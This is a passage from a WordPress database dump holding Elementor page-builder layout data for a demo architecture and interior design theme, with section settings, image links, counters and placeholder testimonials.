0.1)\"},\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"50\",\"bottom\":\"40\",\"left\":\"50\",\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-110\",\"left\":0,\"isLinked\":false},\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-couter.png\",\"id\":3570,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"%\",\"size\":-290,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":120,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":53,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":71,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"30\",\"bottom\":\"40\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[{\"id\":\"617f43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ac2aeba\",\"elType\":\"widget\",\"settings\":{\"title\":\"Project Completed\",\"icon\":{\"value\":\"flaticon flaticon-architect-1\",\"library\":\"flaticon\"},\"number\":6800},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"431e0f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"da1e266\",\"elType\":\"widget\",\"settings\":{\"title\":\"Architectures\",\"number\":906,\"icon\":{\"value\":\"flaticon flaticon-architect\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"5255259\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"083da50\",\"elType\":\"widget\",\"settings\":{\"title\":\"Service providing\",\"number\":200,\"icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"944a539\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"d0e2ce9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy customers\",\"number\":9760,\"icon\":{\"value\":\"flaticon flaticon-satisfaction\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4388608\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b6b9eaa\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a2ebcc\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our Architects\",\"title\":\"Our expert team\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"9d2f9e3\",\"elType\":\"widget\",\"settings\":{\"info_background_background\":\"classic\",\"info_background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-lines-team.png\",\"id\":937,\"alt\":\"\",\"source\":\"library\"},\"info_background_position\":\"top right\",\"info_background_repeat\":\"no-repeat\"},\"elements\":[],\"widgetType\":\"ova_team\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7836724\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b90ed21\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b88a577\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01.png\",\"id\":752,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ad43d0d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"35d31c6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02.png\",\"id\":753,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0eaabe3\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4c51b79\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03.png\",\"id\":754,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ee06889\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"02c4aae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04.png\",\"id\":755,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c6b5264\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c3c96cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05.jpg.png\",\"id\":757,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6720e69\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"77fc613\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06.png\",\"id\":756,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(3054,4746,'_elementor_page_assets','a:1:{s:6:\"styles\";a:4:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";}}'),(3055,4746,'_elementor_pro_version','3.8.1'),(3056,4746,'_elementor_css','a:6:{s:4:\"time\";i:1670315124;s:5:\"fonts\";a:1:{i:0;s:4:\"Reey\";}s:5:\"icons\";a:4:{i:0;s:8:\"fa-solid\";i:3;s:3:\"all\";i:4;s:0:\"\";i:6;s:8:\"flaticon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3057,4747,'_wp_page_template','elementor_header_footer'),(3058,4747,'_elementor_edit_mode','builder'),(3059,4747,'_elementor_template_type','wp-page'),(3060,4747,'_elementor_version','3.8.1'),(3061,4747,'_elementor_data','[{\"id\":\"013ca3e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-section-1.png\",\"id\":3589,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center right\",\"background_repeat\":\"no-repeat\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false},\"background_position_tablet\":\"top right\",\"background_size\":\"auto\",\"gap\":\"no\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"b6a844e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50.684,\"_inline_size_tablet\":100,\"align\":\"flex-end\",\"align_tablet\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-right\",\"animation_tablet\":\"none\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"56708b8\",\"elType\":\"widget\",\"settings\":{\"template\":\"template_2\",\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-get-to-know-us.jpg\",\"id\":710,\"alt\":\"\",\"source\":\"library\"},\"show_line_left\":\"yes\",\"text_left\":\"Architect\",\"text_left_margin\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"image_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_height_mobile\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"line_width_left_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"1829eb5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":49.316,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-left\",\"animation_tablet\":\"none\"},\"elements\":[{\"id\":\"2733af6\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"LOREM IPSUM\",\"title\":\"LOREM IPSUM\\n\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"dcb995a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">Redesign Life<\\/span><\\/p><p><span style=\\\"font-weight: 400;\\\">We believe that interior design is beyond aesthetic and function, it should represent personality and characteristic of a person. We capture the spirit, passion and taste of out client and apply them into design. Our brand spirit \\u2018\\u2019redesign life\\u2019\\u2019 is about giving major change to people\\u2019\\u2019s life and makes their home as inspiring place.<\\/span><\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2eb768f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"space_between\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"space_between_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"icon_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"f3caa1a\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\"},\"elements\":[{\"id\":\"697046f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20},\"elements\":[{\"id\":\"4b2c591\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_element_width\":\"auto\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"_border_color\":\"#E3B25A\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"9b875c0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":79.92,\"space_between_widgets\":10},\"elements\":[{\"id\":\"1150f91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Mike Hardson\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h3\",\"typography_font_family\":\"Reey\",\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"23ae2ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"CO - FOUNDER\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e8e90de\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5b19198\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d460dea\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking about retirio\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"da0b416\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"11f956f\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"d232423\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#E3B25A\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"8056628\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\",\"_id\":\"51a9c88\"}],\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9c560b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"63f0bcf\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9b446cc\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"94218cd\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"9ac0b32\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"f80af3e\"}],\"background_item_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"-15\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"bounceInUp\",\"_animation_tablet\":\"none\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"dot_control\":\"yes\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5079813\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-contact-with-us.jpg\",\"id\":2653,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#242424\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"170\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4971895\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":30},\"elements\":[{\"id\":\"22aaaa7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges in deploying\\ninterior design applications\",\"align\":\"center\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"800\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"16\",\"bottom\":\"0\",\"left\":\"16\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_element_custom_width\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":42,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fe7bd92\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"Get your quote or call: \",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"6dcb687\",\"phone_label\":\"+ 1800-111-543 \",\"phone_address\":\"1800111543\"}],\"alignment\":\"center\",\"label_color\":\"#FFFFFF\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"label_typography_font_weight\":\"700\",\"label_margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display\":\"inline-flex\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"700\",\"info_color\":\"#E3B25A\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display_mobile\":\"inline-block\",\"alignment_mobile\":\"center\",\"info_item_alignment_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"1dbd858\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact with us\",\"background_color\":\"#FFFFFF\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"38\",\"bottom\":\"18\",\"left\":\"38\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"button_text_color\":\"#2D2D2D\",\"hover_color\":\"#FFFFFF\",\"button_bg_hover\":\"#E3B25A\",\"_animation\":\"none\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a9e80df\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-66\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c5b31d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1ecd2ea\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"40\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":10,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.1)\"},\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"50\",\"bottom\":\"40\",\"left\":\"50\",\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-110\",\"left\":0,\"isLinked\":false},\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-couter.png\",\"id\":3570,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"%\",\"size\":-290,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":120,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":53,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":71,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"30\",\"bottom\":\"40\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[{\"id\":\"617f43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ac2aeba\",\"elType\":\"widget\",\"settings\":{\"title\":\"Project Completed\",\"icon\":{\"value\":\"flaticon 